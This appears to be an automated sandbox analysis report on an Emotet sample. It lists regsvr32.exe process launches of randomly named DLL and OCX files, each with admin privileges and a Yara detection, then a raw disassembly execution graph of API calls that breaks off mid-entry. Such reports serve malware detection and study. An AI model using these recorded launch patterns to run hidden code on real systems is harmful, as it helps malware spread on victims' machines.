                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:4
                                  Start time:09:50:24
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:5
                                  Start time:09:50:24
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:09:50:27
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:7
                                  Start time:09:50:29
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:8
                                  Start time:09:50:31
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:9
                                  Start time:09:50:35
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:10
                                  Start time:09:50:37
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:7.3%
                                    Dynamic/Decrypted Code Coverage:2.3%
                                    Signature Coverage:10.3%
                                    Total number of Nodes:1849
                                    Total number of Limit Nodes:30
                                    execution_graph 16388 7fef9d23110 16391 7fef9d211e0 16388->16391 16392 7fef9d211f8 RtlExitUserProcess 16391->16392 16653 7fef9d30215 16654 7fef9d30231 16653->16654 16658 7fef9d30302 16653->16658 16724 7fef9d38c80 16654->16724 16656 7fef9d30489 16744 7fef9d32d80 16656->16744 16661 7fef9d3040d 16658->16661 16731 7fef9d38c30 16658->16731 16659 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16662 7fef9d3027e OutputDebugStringW 16659->16662 16661->16656 16664 7fef9d31640 17 API calls 16661->16664 16665 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16662->16665 16663 7fef9d304a3 16666 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16663->16666 16668 7fef9d3045c 16664->16668 16677 7fef9d302f2 16665->16677 16670 7fef9d304d0 16666->16670 16671 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16668->16671 16672 7fef9d3053d 16670->16672 16673 7fef9d32d80 17 API calls 16670->16673 16679 7fef9d30583 16670->16679 16671->16656 16674 7fef9d32d80 17 API calls 16672->16674 16675 7fef9d30510 16673->16675 16676 7fef9d30556 16674->16676 16680 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16675->16680 16681 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16676->16681 16682 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16677->16682 16678 7fef9d30357 16683 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16678->16683 16684 7fef9d303af 16678->16684 16757 7fef9d31590 16679->16757 16680->16672 16681->16679 16686 7fef9d30cae 16682->16686 16683->16684 16684->16661 16734 7fef9d31640 16684->16734 16687 7fef9d303e0 16689 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16687->16689 16689->16661 16690 7fef9d305fa 16691 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16690->16691 16692 7fef9d30652 16690->16692 16691->16692 16693 7fef9d31640 17 API calls 16692->16693 16696 7fef9d306b0 16692->16696 16694 7fef9d30683 16693->16694 16695 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16694->16695 16695->16696 16697 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16696->16697 16698 7fef9d30769 16697->16698 16699 7fef9d2d490 std::exception::_Copy_str 17 API calls 16698->16699 16714 7fef9d307bd 16698->16714 16700 7fef9d30790 16699->16700 16701 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16700->16701 16701->16714 16702 7fef9d30905 16702->16677 16703 7fef9d30a26 16702->16703 16704 7fef9d309a4 GetFileType 16702->16704 16705 7fef9d30ba5 16703->16705 16706 7fef9d30b97 OutputDebugStringW 16703->16706 16708 7fef9d309d0 16704->16708 16712 7fef9d309ce 16704->16712 16705->16677 16709 7fef9d30c23 16705->16709 16711 7fef9d38c80 _itow_s 17 API calls 16705->16711 16706->16705 16710 7fef9d309dd WriteConsoleW 16708->16710 16761 7fef9d2b470 16709->16761 16710->16703 16715 7fef9d30a2b GetLastError 16710->16715 16713 7fef9d30bf6 16711->16713 16716 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16712->16716 16717 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16713->16717 16714->16702 16760 7fef9d29360 LeaveCriticalSection 16714->16760 16715->16703 16715->16712 16719 7fef9d30ab5 16716->16719 16717->16709 16720 7fef9d30b26 WriteFile 16719->16720 16721 7fef9d30ad0 16719->16721 16720->16703 16723 7fef9d30add WriteFile 16721->16723 16723->16703 16725 7fef9d38cd3 16724->16725 16726 7fef9d38ca6 16724->16726 16728 7fef9d38d00 _itow_s 17 API calls 16725->16728 16726->16725 16727 7fef9d38cad 16726->16727 16787 7fef9d38d00 16727->16787 16730 7fef9d30251 16728->16730 16730->16659 16803 7fef9d386b0 16731->16803 16733 7fef9d38c74 16733->16678 16735 7fef9d31661 16734->16735 16736 7fef9d316c2 16735->16736 16738 7fef9d31700 _calloc_dbg_impl 16735->16738 16737 7fef9d2bd70 _invalid_parameter 17 API calls 16736->16737 16740 7fef9d316f6 _calloc_dbg_impl 16737->16740 16739 7fef9d317f4 16738->16739 16742 7fef9d31832 _calloc_dbg_impl 16738->16742 16741 7fef9d2bd70 _invalid_parameter 17 API calls 16739->16741 16740->16687 16741->16740 16742->16740 16743 7fef9d2bd70 _invalid_parameter 17 API calls 16742->16743 16743->16740 16745 7fef9d32da1 16744->16745 16746 7fef9d32e02 16745->16746 16748 7fef9d32e40 _calloc_dbg_impl 16745->16748 16747 7fef9d2bd70 _invalid_parameter 17 API calls 16746->16747 16752 7fef9d32e36 _calloc_dbg_impl 16747->16752 16749 7fef9d32f34 16748->16749 16750 7fef9d32f72 _calloc_dbg_impl 16748->16750 16753 7fef9d2bd70 _invalid_parameter 17 API calls 16749->16753 16751 7fef9d330b5 16750->16751 16754 7fef9d330f3 _calloc_dbg_impl 16750->16754 16755 7fef9d2bd70 _invalid_parameter 17 API calls 16751->16755 16752->16663 16753->16752 16754->16752 16756 7fef9d2bd70 _invalid_parameter 17 API calls 16754->16756 16755->16752 16756->16752 16758 7fef9d386b0 _wcsftime_l 17 API calls 16757->16758 16759 7fef9d315de 16758->16759 16759->16690 16760->16702 16762 7fef9d2b48d 16761->16762 16763 7fef9d2b4ce GetModuleFileNameW 16762->16763 16764 7fef9d2b4c4 16762->16764 16765 7fef9d2b4f2 16763->16765 16770 7fef9d2b538 16763->16770 16766 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16764->16766 16767 7fef9d31640 17 API calls 16765->16767 16768 7fef9d2ba58 16766->16768 16769 7fef9d2b50b 16767->16769 16768->16677 16771 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16769->16771 16775 7fef9d2b5f2 16770->16775 16825 7fef9d30fd0 16770->16825 16771->16770 16773 7fef9d2b5c5 16774 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16773->16774 16774->16775 16776 7fef9d31590 _snwprintf_s 17 API calls 16775->16776 16777 7fef9d2b940 16776->16777 16778 7fef9d2b998 16777->16778 16779 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16777->16779 16780 7fef9d31640 17 API calls 16778->16780 16783 7fef9d2b9f6 16778->16783 16779->16778 16781 7fef9d2b9c9 16780->16781 16782 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16781->16782 16782->16783 16783->16764 16835 7fef9d2cff0 16783->16835 16788 7fef9d38d25 16787->16788 16789 7fef9d38d7b 16788->16789 16790 7fef9d38db9 16788->16790 16791 7fef9d2bd70 _invalid_parameter 17 API calls 16789->16791 16792 7fef9d38e1a 16790->16792 16796 7fef9d38e58 _calloc_dbg_impl 16790->16796 16800 7fef9d38daf 16791->16800 16793 7fef9d2bd70 _invalid_parameter 17 API calls 16792->16793 16793->16800 16794 7fef9d38f9b 16798 7fef9d3900e 16794->16798 16801 7fef9d3904c 16794->16801 16795 7fef9d38f5d 16797 7fef9d2bd70 _invalid_parameter 17 API calls 16795->16797 16796->16794 16796->16795 16797->16800 16799 7fef9d2bd70 _invalid_parameter 17 API calls 16798->16799 16799->16800 16800->16730 16801->16800 16802 7fef9d2bd70 _invalid_parameter 17 API calls 16801->16802 16802->16800 16804 7fef9d386e6 16803->16804 16805 7fef9d3873c 16804->16805 16807 7fef9d3877a 16804->16807 16806 7fef9d2bd70 _invalid_parameter 17 API calls 16805->16806 16815 7fef9d38770 _calloc_dbg_impl 16806->16815 16808 7fef9d3880e 16807->16808 16809 7fef9d3884c 16807->16809 16807->16815 16812 7fef9d2bd70 _invalid_parameter 17 API calls 16808->16812 16810 7fef9d38992 16809->16810 16811 7fef9d38862 16809->16811 16814 7fef9d38350 _wcsftime_l 17 API calls 16810->16814 16818 7fef9d38350 16811->16818 16812->16815 16816 7fef9d388b1 _calloc_dbg_impl 16814->16816 16815->16733 16816->16815 16817 7fef9d2bd70 _invalid_parameter 17 API calls 16816->16817 16817->16815 16820 7fef9d3839b 16818->16820 16819 7fef9d383f1 16821 7fef9d2bd70 _invalid_parameter 17 API calls 16819->16821 16820->16819 16822 7fef9d3842f 16820->16822 16824 7fef9d38425 16821->16824 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16822->16823 16822->16824 16823->16824 16824->16816 16826 7fef9d30ff7 16825->16826 16828 7fef9d30ff0 __SehTransFilter 16825->16828 16827 7fef9d31055 16826->16827 16830 7fef9d31093 _calloc_dbg_impl 16826->16830 16829 7fef9d2bd70 _invalid_parameter 17 API calls 16827->16829 16828->16773 16829->16828 16830->16828 16831 7fef9d3111a 16830->16831 16833 7fef9d31158 16830->16833 16832 7fef9d2bd70 _invalid_parameter 17 API calls 16831->16832 16832->16828 16833->16828 16834 7fef9d2bd70 _invalid_parameter 17 API calls 16833->16834 16834->16828 16837 7fef9d2d02a 16835->16837 16836 7fef9d2d1d8 DecodePointer 16838 7fef9d2d1e8 16836->16838 16837->16836 16840 7fef9d2bd70 _invalid_parameter 17 API calls 16837->16840 16839 7fef9d2ba2b 16838->16839 16842 7fef9d27090 _exit 33 API calls 16838->16842 16843 7fef9d2d209 16838->16843 16847 7fef9d27090 16839->16847 16841 7fef9d2d1ce 16840->16841 16841->16836 16841->16839 16842->16843 16845 7fef9d2d289 16843->16845 16850 7fef9d23d00 RtlEncodePointer 16843->16850 16845->16839 16851 7fef9d29360 LeaveCriticalSection 16845->16851 16848 7fef9d27280 _exit 33 API calls 16847->16848 16849 7fef9d270a9 16848->16849 16849->16764 16850->16845 16851->16839 16852 7fef9d2ae14 16853 7fef9d2b390 16852->16853 16854 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16853->16854 16855 7fef9d2b3a0 16854->16855 16856 7fef9d32c10 16857 7fef9d32c53 16856->16857 16858 7fef9d32c24 _updatetlocinfoEx_nolock 16856->16858 16860 7fef9d29360 LeaveCriticalSection 16858->16860 16860->16857 16861 7fef9d3d410 16866 7fef9d3d3e0 16861->16866 16864 7fef9d3d43c 16873 7fef9d40070 16866->16873 16869 7fef9d3d710 16870 7fef9d3d721 16869->16870 16871 7fef9d3d726 16869->16871 16870->16864 16878 7fef9d29360 LeaveCriticalSection 16871->16878 16876 7fef9d40083 _free_nolock 16873->16876 16875 7fef9d3d402 16875->16864 16875->16869 16877 7fef9d29360 LeaveCriticalSection 16876->16877 16877->16875 16878->16870 16456 1800010e8 16459 18001dbfc 16456->16459 16458 180001151 16464 18001dc49 16459->16464 16460 18001f803 16471 18002191c 16460->16471 16463 18001f7d8 16463->16458 16464->16460 16464->16463 16465 1800171b8 16464->16465 16468 1800171da 16465->16468 16469 18001752f 16468->16469 16475 18000d12c 16468->16475 16479 180005e7c 16468->16479 16483 180019af0 16468->16483 16469->16464 16474 180021941 16471->16474 16472 18000c85c CreateProcessW 16473 180021f5a 16472->16473 16473->16463 16474->16472 16474->16473 16478 18000d176 16475->16478 16477 18000db07 16477->16468 16478->16477 16487 18000c85c 16478->16487 16482 180005eb1 16479->16482 16480 18000c85c CreateProcessW 16480->16482 16481 1800064ba 16481->16468 16482->16480 16482->16481 16486 180019b56 16483->16486 16484 18001aa27 16484->16468 16485 18000c85c CreateProcessW 16485->16486 16486->16484 16486->16485 16488 18000c8c2 16487->16488 16491 1800178a8 16488->16491 16490 18000ca47 16490->16477 16493 180017939 16491->16493 16492 180017a02 CreateProcessW 16492->16490 16493->16492 16879 7fef9d27816 16880 7fef9d27826 _calloc_dbg 16879->16880 16883 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16880->16883 16884 7fef9d27a19 GetFileType 16880->16884 16885 7fef9d27ab9 16880->16885 16881 7fef9d27ce0 SetHandleCount 16882 7fef9d27aaf 16881->16882 16883->16882 16883->16885 16884->16883 16884->16885 16885->16881 16886 7fef9d27b95 GetStdHandle 16885->16886 16887 7fef9d27c7b 16885->16887 16886->16887 16888 7fef9d27bb9 16886->16888 16887->16881 16888->16887 16889 7fef9d27bc8 GetFileType 16888->16889 16889->16887 16890 7fef9d27beb InitializeCriticalSectionAndSpinCount 16889->16890 16890->16882 16890->16887 16516 7fef9d2461b 16519 7fef9d24625 _calloc_dbg_impl 16516->16519 16518 7fef9d248be 16520 7fef9d29360 LeaveCriticalSection 16519->16520 16520->16518 16898 7fef9d36203 16899 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16898->16899 16900 7fef9d36238 MultiByteToWideChar 16899->16900 16901 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16899->16901 16900->16901 16902 7fef9d40204 16904 7fef9d4023d 16902->16904 16903 7fef9d403d7 16904->16903 16906 7fef9d40326 16904->16906 16908 7fef9d3ab10 16904->16908 16906->16903 16912 7fef9d39290 16906->16912 16909 7fef9d3ab23 16908->16909 16910 7fef9d3ab35 16908->16910 16909->16906 16910->16909 16911 7fef9d2bd70 _invalid_parameter 17 API calls 16910->16911 16911->16909 16913 7fef9d392d8 16912->16913 16914 7fef9d392b6 __doserrno 16912->16914 16915 7fef9d39341 __doserrno 16913->16915 16919 7fef9d3938c 16913->16919 16914->16903 16917 7fef9d2bd70 _invalid_parameter 17 API calls 16915->16917 16916 7fef9d3945b 16926 7fef9d3fae0 16916->16926 16917->16914 16919->16916 16921 7fef9d39410 __doserrno 16919->16921 16923 7fef9d2bd70 _invalid_parameter 17 API calls 16921->16923 16923->16914 16924 7fef9d394a6 __doserrno 16940 7fef9d3fbc0 LeaveCriticalSection 16924->16940 16927 7fef9d3fb25 16926->16927 16928 7fef9d3fb7a 16926->16928 16931 7fef9d3fb56 16927->16931 16932 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16927->16932 16929 7fef9d39464 16928->16929 16930 7fef9d3fb81 EnterCriticalSection 16928->16930 16929->16924 16934 7fef9d39520 16929->16934 16930->16929 16941 7fef9d29360 LeaveCriticalSection 16931->16941 16932->16931 16942 7fef9d3f900 16934->16942 16936 7fef9d39545 16937 7fef9d3959d SetFilePointer 16936->16937 16939 7fef9d39552 _dosmaperr 16936->16939 16938 7fef9d395c1 GetLastError 16937->16938 16937->16939 16938->16939 16939->16924 16940->16914 16941->16928 16943 7fef9d3f935 16942->16943 16945 7fef9d3f913 __doserrno 16942->16945 16944 7fef9d3f99e __doserrno 16943->16944 16947 7fef9d3f9e9 __doserrno 16943->16947 16946 7fef9d2bd70 _invalid_parameter 17 API calls 16944->16946 16945->16936 16946->16945 16947->16945 16948 7fef9d2bd70 _invalid_parameter 17 API calls 16947->16948 16948->16945 16949 7fef9d41200 16952 7fef9d2ed30 16949->16952 16951 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16953 7fef9d2ed3e 16952->16953 16955 7fef9d2ed4c 16953->16955 16958 7fef9d2cf80 DecodePointer 16953->16958 16956 7fef9d2cf80 _inconsistency 36 API calls 16955->16956 16957 7fef9d2ed88 16955->16957 16956->16957 16957->16951 16959 7fef9d2cf9e 16958->16959 16962 7fef9d2cf50 16959->16962 16964 7fef9d2cf59 16962->16964 16966 7fef9d339e0 16964->16966 16967 7fef9d339fa 16966->16967 16976 7fef9d2d430 DecodePointer 16967->16976 16969 7fef9d33a09 16970 7fef9d33a20 16969->16970 16971 7fef9d2cff0 terminate 34 API calls 16969->16971 16972 7fef9d33a42 16970->16972 16973 7fef9d2be50 terminate 14 API calls 16970->16973 16971->16970 16974 7fef9d27090 _exit 33 API calls 16972->16974 16973->16972 16975 7fef9d2cf78 16974->16975 16975->16955 16976->16969 16982 7fef9d23409 16983 7fef9d23e00 3 API calls 16982->16983 16984 7fef9d2340e 16983->16984 16987 7fef9d288d0 HeapDestroy 16984->16987 16986 7fef9d23413 16987->16986 18150 7fef9d23909 18151 7fef9d23913 __SehTransFilter 18150->18151 18152 7fef9d239db __SehTransFilter 18151->18152 18153 7fef9d23a71 RtlUnwindEx 18151->18153 18153->18152 18177 7fef9d3c30d 18178 7fef9d3c31a get_int64_arg _get_printf_count_output 18177->18178 18179 7fef9d3c39d 18178->18179 18190 7fef9d3c3f2 18178->18190 18180 7fef9d2bd70 _invalid_parameter 17 API calls 18179->18180 18181 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18180->18181 18183 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18181->18183 18182 7fef9d3b99c 18185 7fef9d3cc93 18182->18185 18188 7fef9d3bada 18182->18188 18184 7fef9d3cd90 18183->18184 18185->18181 18187 7fef9d2bd70 _invalid_parameter 17 API calls 18185->18187 18186 7fef9d3b530 wctomb_s 19 API calls 18186->18190 18187->18181 18189 7fef9d2bd70 _invalid_parameter 17 API calls 18188->18189 18189->18181 18190->18182 18190->18186 16393 7fef9d23d30 16411 7fef9d27540 16393->16411 16398 7fef9d23d4e FlsAlloc 16401 7fef9d23d73 _calloc_dbg 16398->16401 16402 7fef9d23d6a 16398->16402 16399 7fef9d23d42 16400 7fef9d23e00 3 API calls 16399->16400 16403 7fef9d23d47 16400->16403 16405 7fef9d23da4 FlsSetValue 16401->16405 16406 7fef9d23db9 16401->16406 16404 7fef9d23e00 3 API calls 16402->16404 16404->16403 16405->16406 16407 7fef9d23dc2 16405->16407 16408 7fef9d23e00 3 API calls 16406->16408 16420 7fef9d23e30 16407->16420 16408->16403 16426 7fef9d23d00 RtlEncodePointer 16411->16426 16413 7fef9d27549 _initp_misc_winsig 16427 7fef9d2cf20 EncodePointer 16413->16427 16415 7fef9d23d39 16416 7fef9d28fe0 16415->16416 16418 7fef9d28ff6 16416->16418 16417 7fef9d23d3e 16417->16398 16417->16399 16418->16417 16419 7fef9d29022 InitializeCriticalSectionAndSpinCount 16418->16419 16419->16417 16419->16418 16421 7fef9d23ead 16420->16421 16428 7fef9d29360 LeaveCriticalSection 16421->16428 16423 7fef9d23ec7 _updatetlocinfoEx_nolock 16429 7fef9d29360 LeaveCriticalSection 16423->16429 16425 7fef9d23dce GetCurrentThreadId 16425->16403 16426->16413 16427->16415 16428->16423 16429->16425 16997 7fef9d2e830 16998 7fef9d2e857 16997->16998 17001 7fef9d33cc0 16998->17001 17002 7fef9d33cdd 17001->17002 17004 7fef9d33d82 17002->17004 17005 7fef9d33ef3 __SehTransFilter 17002->17005 17016 7fef9d2e8e3 17002->17016 17006 7fef9d33dc8 17004->17006 17010 7fef9d33e40 17004->17010 17004->17016 17005->17016 17039 7fef9d340b0 17005->17039 17019 7fef9d33a60 17006->17019 17011 7fef9d2cf80 _inconsistency 36 API calls 17010->17011 17014 7fef9d33e93 17010->17014 17017 7fef9d33ebd 17010->17017 17011->17014 17012 7fef9d33e08 17025 7fef9d34f20 17012->17025 17013 7fef9d2cf80 _inconsistency 36 API calls 17013->17012 17015 7fef9d34f20 __SehTransFilter 36 API calls 17014->17015 17015->17017 17017->17016 17032 7fef9d2e790 17017->17032 17020 7fef9d33a7b 17019->17020 17021 7fef9d33a7d 17019->17021 17023 7fef9d2cf80 _inconsistency 36 API calls 17020->17023 17024 7fef9d33aa5 17020->17024 17022 7fef9d2cf80 _inconsistency 36 API calls 17021->17022 17022->17020 17023->17024 17024->17012 17024->17013 17084 7fef9d33b70 17025->17084 17027 7fef9d2cf80 _inconsistency 36 API calls 17031 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 17027->17031 17028 7fef9d35103 17029 7fef9d3514a __SetState 17028->17029 17030 7fef9d2cf80 _inconsistency 36 API calls 17028->17030 17029->17016 17030->17029 17031->17027 17031->17028 17091 7fef9d2e500 17032->17091 17035 7fef9d33b40 __StateFromControlPc 36 API calls 17036 7fef9d2e7d0 __SehTransFilter 17035->17036 17037 7fef9d34f20 __SehTransFilter 36 API calls 17036->17037 17038 7fef9d2e81e 17037->17038 17038->17016 17040 7fef9d33b40 __StateFromControlPc 36 API calls 17039->17040 17041 7fef9d340ea 17040->17041 17042 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17041->17042 17043 7fef9d34110 17042->17043 17096 7fef9d33c70 17043->17096 17046 7fef9d34133 __SetState 17099 7fef9d33c00 17046->17099 17047 7fef9d34176 17048 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17047->17048 17049 7fef9d34174 17048->17049 17051 7fef9d2cf80 _inconsistency 36 API calls 17049->17051 17052 7fef9d341af _ValidateRead _SetThrowImageBase 17049->17052 17051->17052 17054 7fef9d34347 17052->17054 17061 7fef9d34235 17052->17061 17069 7fef9d2cf80 _inconsistency 36 API calls 17052->17069 17071 7fef9d3428e 17052->17071 17053 7fef9d347d9 17055 7fef9d347f3 17053->17055 17056 7fef9d34847 17053->17056 17062 7fef9d347d7 17053->17062 17054->17053 17057 7fef9d343f5 17054->17057 17129 7fef9d34960 17055->17129 17059 7fef9d2cf50 terminate 35 API calls 17056->17059 17064 7fef9d3466c __SehTransFilter 17057->17064 17114 7fef9d2ea30 17057->17114 17059->17062 17061->17016 17062->17061 17063 7fef9d2cf80 _inconsistency 36 API calls 17062->17063 17063->17061 17064->17062 17065 7fef9d35bb0 __SehTransFilter 36 API calls 17064->17065 17066 7fef9d34727 17065->17066 17066->17062 17067 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17066->17067 17068 7fef9d34767 17067->17068 17126 7fef9d2edc0 RtlUnwindEx 17068->17126 17069->17071 17072 7fef9d2cf80 _inconsistency 36 API calls 17071->17072 17073 7fef9d342fa 17071->17073 17072->17073 17073->17054 17102 7fef9d35bb0 17073->17102 17074 7fef9d34450 __SehTransFilter 17074->17064 17119 7fef9d35180 17074->17119 17077 7fef9d34340 __SehTransFilter 17077->17054 17078 7fef9d34393 17077->17078 17079 7fef9d3435a __SehTransFilter 17077->17079 17080 7fef9d2cf50 terminate 35 API calls 17078->17080 17108 7fef9d34870 17079->17108 17080->17054 17085 7fef9d33b9a 17084->17085 17086 7fef9d33ba9 17084->17086 17088 7fef9d33b40 17085->17088 17086->17031 17089 7fef9d33a60 __StateFromControlPc 36 API calls 17088->17089 17090 7fef9d33b65 17089->17090 17090->17086 17092 7fef9d33b40 __StateFromControlPc 36 API calls 17091->17092 17094 7fef9d2e539 17092->17094 17093 7fef9d2e601 17093->17035 17094->17093 17095 7fef9d2e5c2 RtlLookupFunctionEntry 17094->17095 17095->17093 17097 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17096->17097 17098 7fef9d33c9c 17097->17098 17098->17046 17098->17047 17100 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17099->17100 17101 7fef9d33c31 17100->17101 17101->17049 17103 7fef9d35bc6 17102->17103 17104 7fef9d35bc8 17102->17104 17106 7fef9d2cf50 terminate 35 API calls 17103->17106 17107 7fef9d35bda __SehTransFilter 17103->17107 17105 7fef9d2cf80 _inconsistency 36 API calls 17104->17105 17105->17103 17106->17107 17107->17077 17139 7fef9d3d4e0 17108->17139 17111 7fef9d3d320 17112 7fef9d3d375 17111->17112 17113 